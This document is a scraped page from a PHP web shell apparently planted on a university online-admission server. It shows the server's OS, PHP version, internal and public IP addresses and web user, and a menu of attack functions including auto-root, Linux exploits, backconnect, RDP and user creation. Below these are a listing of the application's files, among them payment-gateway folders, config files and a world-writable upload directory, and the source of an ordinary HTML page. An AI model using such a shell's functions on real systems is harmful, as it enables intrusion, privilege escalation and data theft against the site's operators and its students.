Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.227.140.100
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
mcu /
adm /
[ HOME SHELL ]
Name
Size
Permission
Action
.vscode
[ DIR ]
drwxr-xr-x
Paytm
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
dompdf
[ DIR ]
drwxr-xr-x
hdfc
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
pgReports
[ DIR ]
drwxr-xr-x
pget_photos
[ DIR ]
drwxr-xr-x
pgetadm
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
razorpay
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
tcpdf
[ DIR ]
drwxr-xr-x
upload
[ DIR ]
drwxrwxrwx
.DS_Store
27.87
KB
-rwxr-xr-x
BU_connect.php
442
B
-rwxr-xr-x
MainPage.html
52.35
KB
-rwxr-xr-x
MainPage_dev.html
36.76
KB
-rwxr-xr-x
admission_sms_push.php
2.42
KB
-rwxr-xr-x
app.php
416
B
-rwxr-xr-x
cconfig.php
1.45
KB
-rwxr-xr-x
cronjob_sendsms.php
2.52
KB
-rwxr-xr-x
database.php
405
B
-rwxr-xr-x
error_log.txt
900.33
KB
-rwxr-xr-x
forgot-password.php
2.19
KB
-rwxr-xr-x
forgotPassword.html
3.84
KB
-rwxr-xr-x
host=172.31.20.139
0
B
-rwxr-xr-x
index.html
5.34
KB
-rwxr-xr-x
index_1.html
130
B
-rwxr-xr-x
instruction.html
10.69
KB
-rwxr-xr-x
instruction_10092018.html
8.37
KB
-rwxr-xr-x
instruction_24092018.html
9.08
KB
-rwxr-xr-x
instruction_regn.html
5.07
KB
-rwxr-xr-x
login.php
294
B
-rwxr-xr-x
pg-forgotPassword.html
4.1
KB
-rwxr-xr-x
pg-sign-up.html
7.15
KB
-rwxr-xr-x
pgResponse.php
7.77
KB
-rwxr-xr-x
pgStudStatus.html
4.32
KB
-rwxr-xr-x
pg_instruction.html
8.53
KB
-rwxr-xr-x
pgadm.html
111.5
KB
-rwxr-xr-x
pgindex.html
6.24
KB
-rwxr-xr-x
resetpassword.php
697
B
-rwxr-xr-x
sendGridMail.php
1.28
KB
-rwxr-xr-x
sendMobEmailOTP.php
1.4
KB
-rwxr-xr-x
sendsmsapi.php
760
B
-rwxr-xr-x
sign-up.html
7.29
KB
-rwxr-xr-x
signin.php
992
B
-rwxr-xr-x
signup.php
1.22
KB
-rwxr-xr-x
support.html
5.37
KB
-rwxr-xr-x
upload.php
415
B
-rwxr-xr-x
upload1.php
423
B
-rwxr-xr-x
upload_file.php
748
B
-rwxr-xr-x
upload_file_pg.php
740
B
-rwxr-xr-x
validateRegno.php
2.35
KB
-rwxr-xr-x
verify.php
7.58
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : instruction.html
<!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport" /> <meta http-equiv="cache-control" content="max-age=0" /> <meta http-equiv="cache-control" content="no-cache" /> <meta http-equiv="expires" content="0" /> <meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT" /> <meta http-equiv="pragma" content="no-cache" /> <script type="text/javascript"> var url = window.location.pathname.split("/"); if (url[1] == "bnu") document.write("<title>BNU: Bengaluru North University</title>"); else if (url[1] == "bcu") document.write("<title>BCU: Bengaluru Central University</title>"); </script> <!-- Favicon--> <link rel="icon" href="images/favicon.jpg" type="image/x-icon" /> <!-- Google Fonts --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:400,600,700,800&subset=latin-ext" rel="stylesheet" /> <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet" type="text/css" /> <!-- Bootstrap Core Css --> <link href="plugins/bootstrap/css/bootstrap_adm.css" rel="stylesheet" /> <!-- Waves Effect Css --> <link href="plugins/node-waves/waves.css" rel="stylesheet" /> <!-- Custom Css --> <link href="css/style_adm.css" rel="stylesheet" /> <link href="plugins/sweetalert/sweetalert.css" rel="stylesheet" /> <!-- AdminBSB Themes. You can choose a theme from css/themes instead of get all themes --> <link href="css/themes/all-themes.css" rel="stylesheet" /> <style type="text/css"> .feedback { background-color: #31b0d5; color: white; padding: 10px 20px; border-radius: 4px; border-color: #46b8da; } #mybutton { position: fixed; bottom: 1%; right: 10px; } * { box-sizing: border-box; } /* Button used to open the chat form - fixed at the bottom of the page */ .open-button { background-color: #555; color: white; padding: 16px 10px; border-color: #46b8da; cursor: pointer; font-size: 16px; border-radius: 4px; position: fixed; bottom: 23px; right: 28px; width: 280px; } /* The popup chat - hidden by default */ .chat-popup { display: none; position: fixed; bottom: 0; right: 15px; z-index: 9; } /* Add styles to the form container */ .chat-form-container { max-width: 350px; padding-right: 30px; background-color: white; } /* Full-width textarea */ .chat-form-container textarea { width: 100%; padding: 15px; margin: 5px 0 22px 0; border: none; background: #f1f1f1; resize: none; min-height: 200px; } /* When the textarea gets focus, do something */ .chat-form-container textarea:focus { background-color: #ddd; outline: none; } /* Set a style for the submit/send button */ .chat-form-container .btn { background-color: #4caf50; color: white; padding: 16px 20px; border: none; cursor: pointer; width: 100%; margin-bottom: 10px; opacity: 0.8; } /* Add a red background color to the cancel button */ .chat-form-container .cancel { background-color: red; } /* Add some hover effects to buttons */ .chat-form-container .btn:hover, .open-button:hover { opacity: 1; } </style> </head> <body class="theme-pink" onload="loadPerdata()"> <!-- Page Loader --> <div class="page-loader-wrapper"> <div class="loader"> <div class="preloader"> <div class="spinner-layer pl-red"> <div class="circle-clipper left"> <div class="circle"></div> </div> <div class="circle-clipper right"> <div class="circle"></div> </div> </div> </div> <p>Please wait...</p> </div> </div> <!-- #END# Page Loader --> <!-- Top Bar --> <nav class="navbar"> <div class="container-fluid" style="color: #fff;"> <div class="col-md-12 m-t--5"> <a href="#" class="links" onclick="homeLink()" style="float: right;margin-top: 15px; font-size:16px;color: #fff; " >Logout</a > <center> <script type="text/javascript"> var url = window.location.pathname.split("/"); if (url[1] == "bnu") document.write( '<h2 class="brand" style="margin-left: 50px;">Bengaluru North University</h2>' ); else if (url[1] == "bcu") document.write( '<h2 class="brand" style="margin-left: 50px;">Bengaluru Central University</h2>' ); </script> </center> <center> <h4 class="brand" style="margin-top: -4px;"> Online Admission Entry </h4> </center> </div> </div> </nav> <section class="content"> <div class="row clearfix"> <div class="container-fluid"> <div class="col-lg-10 col-md-10 col-sm-12 col-xs-12"> <div class="card"> <div class="body bg-teal"> <table style="border-radius: 15px !important;border-collapse: unset;border: 1px solid #fff;padding: 10px;" id="studinfo" class="table no-border" ></table> <div class="row clearfix btns"> <div id="admEnt"> <a href="#" onclick="getadmissonDet()" ><button type="button" class="btn btn-lg btn-default waves-effect" > Admission Entry / Corrections </button></a > </div> <div> <a href="support.html" ><button type="button" class="btn btn-lg btn-default waves-effect" > Support </button></a > </div> <div> <a href="#" ><button onclick="rePrintApplication()" type="button" class="btn btn-lg btn-default waves-effect" > Print Application Form </button></a > </div> </div> <div style="margin-top:10px;"> <span id="msg" style="font-weight: 800;"> </span> </div> </div> </div> </div> </div> </div> <!-- <div id="mybutton"> <button class="feedback">Feedback</button> </div> --> <button class="open-button btn btn-success" style="font-size: 16px;" onclick="openForm()" > I Need Help </button> <div class="chat-popup" id="myForm"> <div class="chat-form-container"> <div class="row clearfix"> <div class="card" style="width:300px;"> <div class="header bg-blue"> <h2>Enter Query</h2> </div> <div class="form-group p-b-20" style="padding: 20px;"> <b>My Email ID <span style="color: red;">*</span></b> (Replay Will Be Sent To this Email ID) <div class="form-line"> <input type="text" id="femail" class="form-control" placeholder="My Email ID" name="My Email ID" maxlength="100" autocomplete="off" /> </div> <b>Subject <span style="color: red;">*</span></b> <div class="form-line"> <input type="text" id="fsubject" class="form-control" placeholder="Query Subject" name="Query Subject" maxlength="60" onkeypress="return charKeydown(event);" autocomplete="off" /> </div> <b>Message <span style="color: red;">*</span></b> <div class="form-line"> <textarea id="fmessage" class="form-control" placeholder="Query Message" > </textarea> </div> </div> <div> <button type="submit" class="col-md-6 btn btn-success" onclick="submitquery()" > Send </button> <button type="button" class="col-md-6 btn cancel" onclick="closeForm()" > Close </button> </div> </div> </div> </div> </div> </section> <script src="plugins/jquery/jquery.min.js"></script> <!-- Bootstrap Core Js --> <script src="plugins/bootstrap/js/bootstrap.js"></script> <!-- Select Plugin Js --> <script src="plugins/bootstrap-select/js/bootstrap-select.js"></script> <!-- Slimscroll Plugin Js --> <script src="plugins/jquery-slimscroll/jquery.slimscroll.js"></script> <!-- Waves Effect Plugin Js --> <script src="plugins/node-waves/waves.js"></script> <script src="js/kusPhdAdm.js?v=28" type="text/javascript"></script> <script src="js/MainPageCompressed.js"></script> <!-- Custom Js --> <script src="js/admin.js"></script> <script src="js/login.js"></script> <!-- Demo Js --> <script src="js/demo.js"></script> <script type="text/javascript"> function openForm() { document.getElementById("myForm").style.display = "block"; } function closeForm() { document.getElementById("myForm").style.display = "none"; } </script> </body> </html>
Close